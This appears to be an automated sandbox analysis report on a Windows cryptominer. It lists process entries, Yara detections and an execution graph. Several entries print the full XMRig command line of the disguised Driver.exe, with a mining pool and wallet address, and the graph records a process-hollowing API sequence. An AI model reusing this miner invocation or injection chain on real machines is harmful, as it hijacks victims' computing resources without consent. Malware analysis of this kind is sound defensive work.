                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:09:45:34
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 444 -p 7476 -ip 7476
                                                                                    Imagebase:0x7ff6cc5a0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:09:45:34
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7476 -s 764
                                                                                    Imagebase:0x7ff6cc5a0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:09:45:34
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                                                                                    Imagebase:0x140000000
                                                                                    File size:4'141'064 bytes
                                                                                    MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000002.3093772534.0000000000466000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000003.2163629523.0000000000465000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000003.2163629523.0000000000463000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000002.3093652919.000000000043D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000003.2064137301.0000000000464000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000003.2399480104.0000000000465000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:09:45:35
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0xc60000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:13
                                                                                    Start time:09:47:49
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                    Imagebase:0x7ff6eef20000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:14
                                                                                    Start time:09:47:49
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 476 -p 7632 -ip 7632
                                                                                    Imagebase:0x7ff6a93d0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:15
                                                                                    Start time:09:47:49
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7632 -s 864
                                                                                    Imagebase:0x7ff6a93d0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:16
                                                                                    Start time:09:47:53
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                                                                                    Imagebase:0x140000000
                                                                                    File size:4'141'064 bytes
                                                                                    MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.3707277603.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.3283522965.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.3707277603.0000000000581000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.3184707132.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.3383726249.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:17
                                                                                    Start time:09:47:54
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:18
                                                                                    Start time:09:48:50
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 544 -p 6272 -ip 6272
                                                                                    Imagebase:0x7ff6a93d0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:19
                                                                                    Start time:09:48:50
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 6272 -s 864
                                                                                    Imagebase:0x7ff6a93d0000
                                                                                    File size:570'736 bytes
                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:20
                                                                                    Start time:09:48:56
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 44wU5QLtVQR3BYSkYJrSNGJ6jLVgtbpNXM28EiiQyZ7fin6Ki9MnbuCUqghQqJPEon1vZQq1twJ21hupxAhrxeP32CjKnDp -p x -k -v=0 --donate-level=1 -t 2
                                                                                    Imagebase:0x140000000
                                                                                    File size:4'141'064 bytes
                                                                                    MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000014.00000002.4118678441.0000000000421000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000014.00000002.4119483358.0000000140001000.00000040.00000001.01000000.00000006.sdmp, Author: unknown
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:21
                                                                                    Start time:09:48:56
                                                                                    Start date:23/07/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:6.8%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:14.7%
                                                                                      Total number of Nodes:842
                                                                                      Total number of Limit Nodes:20
                                                                                      execution_graph 6369 fd8e7f 6370 fcc3e7 __Getctype 25 API calls 6369->6370 6371 fd8e9f 6370->6371 6372 fcc3e7 __Getctype 25 API calls 6371->6372 6373 fd8ea6 std::_Locinfo::_Locinfo_ctor 6372->6373 6374 fd8eb2 GetLocaleInfoW 6373->6374 6375 fd8edd std::_Locinfo::_Locinfo_ctor 6374->6375 6376 fd8ee2 6374->6376 6378 f8da10 __Getctype 5 API calls 6375->6378 6380 fd3424 6376->6380 6379 fd8f22 6378->6379 6381 fd3432 6380->6381 6384 fd3438 6381->6384 6385 fd346d 6381->6385 6383 fd3468 6383->6375 6384->6375 6386 fd3497 6385->6386 6389 fd347d std::_Locinfo::_Locinfo_ctor 6385->6389 6386->6389 6391 fbe388 6386->6391 6388 fd33e5 26 API calls std::_Locinfo::_Locinfo_ctor 6390 fd34c1 6388->6390 6389->6383 6390->6388 6390->6389 6392 fbe39f 6391->6392 6393 fbe3a6 6391->6393 6392->6390 6393->6392 6394 fcc3e7 __Getctype 25 API calls 6393->6394 6395 fbe3c7 6394->6395 6396 fcca09 __Getctype 25 API calls 6395->6396 6397 fbe3dd 6396->6397 6399 fcca67 6397->6399 6400 fcca7a 6399->6400 6401 fcca8f 6399->6401 6400->6401 6402 fd579b std::_Locinfo::_Locinfo_ctor 25 API calls 6400->6402 6401->6392 6402->6401 6403 f8e1ba 6406 f8ee41 6403->6406 6405 f8e1bf 6405->6405 6407 f8ee57 6406->6407 6409 f8ee60 6407->6409 6410 f8edf4 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6407->6410 6409->6405 6410->6409 6411 fd90b5 6412 fcc3e7 __Getctype 25 API calls 6411->6412 6413 fd90d5 6412->6413 6414 fcc3e7 __Getctype 25 API calls 6413->6414 6415 fd90dc std::_Locinfo::_Locinfo_ctor 6414->6415 6416 fd90e8 GetLocaleInfoW 6415->6416 6417 fd911e 6416->6417 6418 fd924b 6416->6418 6419 fd3424 std::_Locinfo::_Locinfo_ctor 26 API calls 6417->6419 6421 f8da10 __Getctype 5 API calls 6418->6421 6420 fd912d 6419->6420 6422 fd9137 GetLocaleInfoW 6420->6422 6433 fd9170 std::_Locinfo::_Locinfo_ctor 6420->6433 6423 fd9304 6421->6423 6422->6418 6424 fd9161 6422->6424 6426 fd3424 std::_Locinfo::_Locinfo_ctor 26 API calls 6424->6426 6425 fd91fd GetLocaleInfoW 6425->6418 6427 fd9227 6425->6427 6426->6433 6428 fd3424 std::_Locinfo::_Locinfo_ctor 26 API calls 6427->6428 6429 fd9236 6428->6429 6430 fd92a6 6429->6430 6434 fd923c 6429->6434 6430->6418 6431 fd3424 std::_Locinfo::_Locinfo_ctor 26 API calls 6430->6431 6432 fd92c1 6431->6432 6432->6418 6435 fd9537 26 API calls 6432->6435 6433->6418 6433->6425 6434->6418 6437 fd9537 6434->6437 6435->6418 6438 fcc3e7 __Getctype 25 API calls 6437->6438 6439 fd9544 GetLocaleInfoW 6438->6439 6440 fd956d std::_Locinfo::_Locinfo_ctor 6439->6440 6440->6418 5560 fb4370 5567 fa8650 5560->5567 5562 fb4380 5576 fcca36 5562->5576 5568 fa865e GetLastError 5567->5568 5569 fa869f 5567->5569 5570 fa866d 5568->5570 5569->5562 5584 fcc5e9 5570->5584 5572 fa868a SetLastError 5572->5569 5573 fa86a6 5572->5573 5602 f9c3a4 5573->5602 5575 fa86ab 5575->5562 5577 fcca4d 5576->5577 5579 fb439d 5576->5579 5577->5579 5763 fd8471 5577->5763 5580 fcca94 5579->5580 5581 fccaab 5580->5581 5582 fb43aa 5580->5582 5581->5582 5776 fd579b 5581->5776 5585 fcc5fc 5584->5585 5586 fcc602 5584->5586 5620 fcb221 5585->5620 5601 fcc608 5586->5601 5611 fcb260 5586->5611 5591 fcc62c 5592 fcc649 5591->5592 5593 fcc634 5591->5593 5594 fcb260 __Getctype 6 API calls 5592->5594 5595 fcb260 __Getctype 6 API calls 5593->5595 5596 fcc655 5594->5596 5595->5601 5597 fcc668 5596->5597 5598 fcc659 5596->5598 5625 fcbfb0 5597->5625 5599 fcb260 __Getctype 6 API calls 5598->5599 5599->5601 5601->5572 5646 fca3b8 5602->5646 5605 f9c3b4 5607 f9c3be IsProcessorFeaturePresent 5605->5607 5608 f9c3ca 5605->5608 5607->5608 5678 fc61ef 5608->5678 5610 f9c3e7 5610->5575 5612 fcae73 __Getctype 5 API calls 5611->5612 5613 fcb27c 5612->5613 5614 fcb29a TlsSetValue 5613->5614 5615 fcb285 5613->5615 5615->5601 5616 fca7c1 5615->5616 5619 fca7ce __Getctype std::_Facet_Register 5616->5619 5617 fca7f9 RtlAllocateHeap 5618 fca80c 5617->5618 5617->5619 5618->5591 5619->5617 5619->5618 5621 fcae73 __Getctype 5 API calls 5620->5621 5622 fcb23d 5621->5622 5623 fcb258 TlsGetValue 5622->5623 5624 fcb246 5622->5624 5624->5586 5630 fcbc15 5625->5630 5631 fcbc21 5630->5631 5638 fcbc5b 5631->5638 5634 fcbd27 5635 fcbd33 __Getctype 5634->5635 5642 fcbd75 5635->5642 5641 fb86b5 LeaveCriticalSection 5638->5641 5640 fcbc49 5640->5634 5641->5640 5645 fb86b5 LeaveCriticalSection 5642->5645 5644 fcbd63 5644->5601 5645->5644 5681 fca118 5646->5681 5649 fca40f 5650 fca41b 5649->5650 5652 fca442 __Getctype 5650->5652 5689 fcc538 GetLastError 5650->5689 5654 fca4fd 5652->5654 5655 fca5ee 5652->5655 5664 fca52c 5652->5664 5668 fca479 5652->5668 5654->5664 5708 fcc3e7 GetLastError 5654->5708 5656 fca5f9 5655->5656 5754 fb86b5 LeaveCriticalSection 5655->5754 5659 fc61ef __Getctype 15 API calls 5656->5659 5666 fca601 5659->5666 5661 fcc3e7 __Getctype 23 API calls 5665 fca581 5661->5665 5662 fca521 5663 fcc3e7 __Getctype 23 API calls 5662->5663 5663->5664 5750 fca59b 5664->5750 5667 fcc3e7 __Getctype 23 API calls 5665->5667 5665->5668 5669 fca6e8 5666->5669 5670 fca653 5666->5670 5677 fca662 __Getctype 5666->5677 5667->5668 5668->5605 5671 fca713 SetConsoleCtrlHandler 5669->5671 5675 fca724 __Getctype 5669->5675 5674 fcc538 __Getctype 11 API calls 5670->5674 5670->5677 5672 fca72d GetLastError 5671->5672 5671->5675 5755 fbc46b 5672->5755 5674->5677 5758 fca79f 5675->5758 5677->5605 5679 fc5ff4 __Getctype 15 API calls 5678->5679 5680 fc6200 5679->5680 5680->5610 5682 fca124 5681->5682 5685 fca170 5682->5685 5688 fb86b5 LeaveCriticalSection 5685->5688 5687 f9c3a9 5687->5605 5687->5649 5688->5687 5690 fcc54e 5689->5690 5691 fcc554 5689->5691 5692 fcb221 __Getctype 6 API calls 5690->5692 5693 fcb260 __Getctype 6 API calls 5691->5693 5707 fcc558 5691->5707 5692->5691 5694 fcc570 5693->5694 5695 fca7c1 __Getctype RtlAllocateHeap 5694->5695 5694->5707 5697 fcc585 5695->5697 5696 fcc5dd SetLastError 5696->5652 5698 fcc58d 5697->5698 5699 fcc59e 5697->5699 5700 fcb260 __Getctype 6 API calls 5698->5700 5701 fcb260 __Getctype 6 API calls 5699->5701 5700->5707 5702 fcc5aa 5701->5702 5703 fcc5ae 5702->5703 5704 fcc5c5 5702->5704 5705 fcb260 __Getctype 6 API calls 5703->5705 5706 fcbfb0 __Getctype LeaveCriticalSection 5704->5706 5705->5707 5706->5707 5707->5696 5709 fcc3fd 5708->5709 5710 fcc403 5708->5710 5711 fcb221 __Getctype 6 API calls 5709->5711 5712 fcb260 __Getctype 6 API calls 5710->5712 5734 fcc407 5710->5734 5711->5710 5713 fcc41f 5712->5713 5715 fca7c1 __Getctype RtlAllocateHeap 5713->5715 5713->5734 5714 fcc48c SetLastError 5717 fcc49c 5714->5717 5718 fcc497 5714->5718 5716 fcc434 5715->5716 5720 fcc43c 5716->5720 5721 fcc44d 5716->5721 5719 f9c3a4 __Getctype 23 API calls 5717->5719 5718->5662 5722 fcc4a1 5719->5722 5723 fcb260 __Getctype 6 API calls 5720->5723 5724 fcb260 __Getctype 6 API calls 5721->5724 5726 fcc4b3 5722->5726 5729 fcb221 __Getctype 6 API calls 5722->5729 5723->5734 5725 fcc459 5724->5725 5727 fcc45d 5725->5727 5728 fcc474 5725->5728 5730 fcb260 __Getctype 6 API calls 5726->5730 5743 fcc4b9 5726->5743 5731 fcb260 __Getctype 6 API calls 5727->5731 5732 fcbfb0 __Getctype LeaveCriticalSection 5728->5732 5729->5726 5733 fcc4cd 5730->5733 5731->5734 5732->5734 5736 fca7c1 __Getctype RtlAllocateHeap 5733->5736 5733->5743 5734->5714 5735 f9c3a4 __Getctype 23 API calls 5737 fcc537 5735->5737 5738 fcc4dd 5736->5738 5739 fcc4fa 5738->5739 5740 fcc4e5 5738->5740 5741 fcb260 __Getctype 6 API calls 5739->5741 5742 fcb260 __Getctype 6 API calls 5740->5742 5744 fcc506 5741->5744 5742->5743 5743->5735 5749 fcc4be 5743->5749 5745 fcc519 5744->5745 5746 fcc50a 5744->5746 5748 fcbfb0 __Getctype LeaveCriticalSection 5745->5748 5747 fcb260 __Getctype 6 API calls 5746->5747 5747->5743 5748->5749 5749->5662 5751 fca572 5750->5751 5752 fca5a1 5750->5752 5751->5661 5751->5665 5751->5668 5761 fb86b5 LeaveCriticalSection 5752->5761 5754->5656 5756 fcc538 __Getctype 11 API calls 5755->5756 5757 fbc470 5756->5757 5757->5675 5762 fb86b5 LeaveCriticalSection 5758->5762 5760 fca7a6 5760->5677 5761->5751 5762->5760 5764 fd847d 5763->5764 5765 fcc3e7 __Getctype 25 API calls 5764->5765 5767 fd8486 __Getctype 5765->5767 5766 fd84cc 5766->5579 5767->5766 5772 fd84d1 5767->5772 5770 f9c3a4 __Getctype 25 API calls 5771 fd84f1 5770->5771 5775 fb86b5 LeaveCriticalSection 5772->5775 5774 fd84c8 5774->5766 5774->5770 5775->5774 5777 fcc3e7 __Getctype 25 API calls 5776->5777 5778 fd57a0 5777->5778 5781 fd56b0 5778->5781 5780 fd57ab 5780->5582 5787 fd56bc 5781->5787 5782 fd56d6 5783 fd56dd 5782->5783 5784 f9c3a4 __Getctype 25 API calls 5782->5784 5783->5780 5786 fd574f 5784->5786 5786->5780 5787->5782 5788 fd572f 5787->5788 5791 fb86b5 LeaveCriticalSection 5788->5791 5790 fd5736 5790->5782 5791->5790 6447 fd86ef 6448 fcc3e7 __Getctype 25 API calls 6447->6448 6449 fd870e 6448->6449 6484 fcb32d 6449->6484 6452 fd3424 std::_Locinfo::_Locinfo_ctor 26 API calls 6454 fd8750 6452->6454 6453 f8da10 __Getctype 5 API calls 6455 fd89be 6453->6455 6456 fcb32d std::_Locinfo::_Locinfo_ctor 6 API calls 6454->6456 6463 fd87a7 std::_Locinfo::_Locinfo_ctor 6454->6463 6457 fd8783 6456->6457 6459 fd8737 6457->6459 6461 fd3424 std::_Locinfo::_Locinfo_ctor 26 API calls 6457->6461 6458 fcb32d std::_Locinfo::_Locinfo_ctor 6 API calls 6460 fd8854 6458->6460 6459->6453 6460->6459 6462 fd3424 std::_Locinfo::_Locinfo_ctor 26 API calls 6460->6462 6466 fd879e 6461->6466 6465 fd889c 6462->6465 6463->6458 6463->6459 6471 fd89c2 6463->6471 6464 fd88b7 std::_Locinfo::_Locinfo_ctor 6464->6459 6464->6471 6465->6459 6465->6464 6469 fd8b84 11 API calls 6465->6469 6466->6463 6490 fd8b84 6466->6490 6468 fb8595 __Getctype 3 API calls 6470 fd89ce 6468->6470 6469->6464 6472 fcc3e7 __Getctype 25 API calls 6470->6472 6471->6468 6473 fd89ee 6472->6473 6474 fcb32d std::_Locinfo::_Locinfo_ctor 6 API calls 6473->6474 6475 fd8a13 6474->6475 6476 fd3424 std::_Locinfo::_Locinfo_ctor 26 API calls 6475->6476 6481 fd8a17 6475->6481 6479 fd8a2c std::_Locinfo::_Locinfo_ctor 6476->6479 6477 f8da10 __Getctype 5 API calls 6478 fd8a7f 6477->6478 6480 fd8a83 6479->6480 6479->6481 6482 fb8595 __Getctype 3 API calls 6480->6482 6481->6477 6483 fd8a8d 6482->6483 6485 fcabba std::_Locinfo::_Locinfo_ctor 5 API calls 6484->6485 6486 fcb338 6485->6486 6489 fcb347 6486->6489 6495 fcb58b 6486->6495 6488 fcb360 GetLocaleInfoW 6488->6489 6489->6452 6489->6459 6491 fcb32d std::_Locinfo::_Locinfo_ctor 6 API calls 6490->6491 6494 fd8ba8 __Getctype 6491->6494 6492 f8da10 __Getctype 5 API calls 6493 fd8bcf 6492->6493 6493->6463 6494->6492 6498 fcacd8 6495->6498 6497 fcb596 std::_Locinfo::_Locinfo_ctor 6497->6488 6499 fcae73 __Getctype 5 API calls 6498->6499 6500 fcacee 6499->6500 6500->6497 6501 fd89cf 6502 fcc3e7 __Getctype 25 API calls 6501->6502 6503 fd89ee 6502->6503 6504 fcb32d std::_Locinfo::_Locinfo_ctor 6 API calls 6503->6504 6505 fd8a13 6504->6505 6506 fd8a17 6505->6506 6507 fd3424 std::_Locinfo::_Locinfo_ctor 26 API calls 6505->6507 6508 f8da10 __Getctype 5 API calls 6506->6508 6510 fd8a2c std::_Locinfo::_Locinfo_ctor 6507->6510 6509 fd8a7f 6508->6509 6510->6506 6511 fd8a83 6510->6511 6512 fb8595 __Getctype 3 API calls 6511->6512 6513 fd8a8d 6512->6513 5470 1e018d 5471 1e01c5 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 5470->5471 5473 1e03a2 WriteProcessMemory 5471->5473 5474 1e03e7 5473->5474 5475 1e03ec WriteProcessMemory 5474->5475 5476 1e0429 WriteProcessMemory Wow64SetThreadContext ResumeThread 5474->5476 5475->5474 5477 fc61ef 5480 fc5ff4 5477->5480 5481 fc6021 5480->5481 5482 fc6033 5480->5482 5505 fc60c5 GetModuleHandleW 5481->5505 5492 fc5d63 5482->5492 5487 fc6070 5491 fc6085 5493 fc5d6f 5492->5493 5513 fc5ec6 5493->5513 5495 fc5d86 5517 fc5da4 5495->5517 5498 fc608b 5533 fc6108 5498->5533 5501 fc60a9 5503 fc612a __Getctype 3 API calls 5501->5503 5502 fc6099 GetCurrentProcess TerminateProcess 5502->5501 5504 fc60b1 ExitProcess 5503->5504 5506 fc6026 5505->5506 5506->5482 5507 fc612a GetModuleHandleExW 5506->5507 5508 fc6169 GetProcAddress 5507->5508 5509 fc618a 5507->5509 5508->5509 5510 fc617d 5508->5510 5511 fc6032 5509->5511 5512 fc6190 FreeLibrary 5509->5512 5510->5509 5511->5482 5512->5511 5514 fc5ed2 5513->5514 5515 fc5f39 __Getctype 5514->5515 5520 fc76f8 5514->5520 5515->5495 5532 fb86b5 LeaveCriticalSection 5517->5532 5519 fc5d92 5519->5487 5519->5498 5521 fc7704 __EH_prolog3 5520->5521 5524 fc7267 5521->5524 5523 fc772b __Getctype 5523->5515 5525 fc7273 __Getctype 5524->5525 5528 fc72b6 5525->5528 5531 fb86b5 LeaveCriticalSection 5528->5531 5530 fc729f 5530->5523 5531->5530 5532->5519 5538 fcc90d GetPEB 5533->5538 5536 fc6095 5536->5501 5536->5502 5537 fc6112 GetPEB 5537->5536 5539 fc610d 5538->5539 5540 fcc927 5538->5540 5539->5536 5539->5537 5542 fcafd3 5540->5542 5545 fcae73 5542->5545 5546 fcae9d 5545->5546 5547 fcaea1 5545->5547 5546->5539 5547->5546 5552 fcada8 5547->5552 5550 fcaebb GetProcAddress 5550->5546 5551 fcaecb __Getctype 5550->5551 5551->5546 5558 fcadb9 __Getctype 5552->5558 5553 fcae4f 5553->5546 5553->5550 5554 fcadd7 LoadLibraryExW 5555 fcae56 5554->5555 5556 fcadf2 GetLastError 5554->5556 5555->5553 5557 fcae68 FreeLibrary 5555->5557 5556->5558 5557->5553 5558->5553 5558->5554 5559 fcae25 LoadLibraryExW 5558->5559 5559->5555 5559->5558 6514 fd9308 6515 fcc3e7 __Getctype 25 API calls 6514->6515 6516 fd9328 6515->6516 6517 fcc3e7 __Getctype 25 API calls 6516->6517 6518 fd932f std::_Locinfo::_Locinfo_ctor 6517->6518 6519 fd933b GetLocaleInfoW 6518->6519 6520 fd936b 6519->6520 6524 fd9366 6519->6524 6521 fd3424 std::_Locinfo::_Locinfo_ctor 26 API calls 6520->6521 6525 fd937a 6521->6525 6522 f8da10 __Getctype 5 API calls 6523 fd93d9 6522->6523 6524->6522 6525->6524 6526 fd3424 std::_Locinfo::_Locinfo_ctor 26 API calls 6525->6526 6528 fd9383 6525->6528 6526->6528 6527 fd9537 26 API calls 6527->6524 6528->6524 6528->6527 5792 f63b0d 5807 f646fa 5792->5807 5796 f63b33 5818 f6385c 5796->5818 5802 f63b67 5862 f64c6d 5802->5862 5806 f63b9a 5808 f64717 _strlen 5807->5808 5873 f6594e 5808->5873 5810 f63b2c 5811 f8db27 5810->5811 5814 f8db2c std::_Facet_Register 5811->5814 5812 f8db46 5812->5796 5813 f8eb57 5815 f90044 Concurrency::cancel_current_task RaiseException 5813->5815 5814->5812 5814->5813 5817 f90044 Concurrency::cancel_current_task RaiseException 5814->5817 5816 f8eb74 5815->5816 5816->5796 5817->5813 5819 f63956 5818->5819 5827 f6388d 5818->5827 5917 f64833 5819->5917 5822 f8da10 __Getctype 5 API calls 5823 f63970 VirtualAllocEx 5822->5823 5828 f63a4a 5823->5828 5824 f646fa RaiseException IsProcessorFeaturePresent GetCurrentProcess TerminateProcess 5824->5827 5825 f64c93 RaiseException IsProcessorFeaturePresent GetCurrentProcess TerminateProcess 5825->5827 5826 f64c6d IsProcessorFeaturePresent GetCurrentProcess TerminateProcess 5826->5827 5827->5819 5827->5824 5827->5825 5827->5826 5829 f8db27 std::_Facet_Register RaiseException 5828->5829 5830 f63a66 5829->5830 5831 f646fa 4 API calls 5830->5831 5832 f63a77 5831->5832 5833 f64c6d 3 API calls 5832->5833 5835 f63a7f 5833->5835 5836 f63ac9 5835->5836 5940 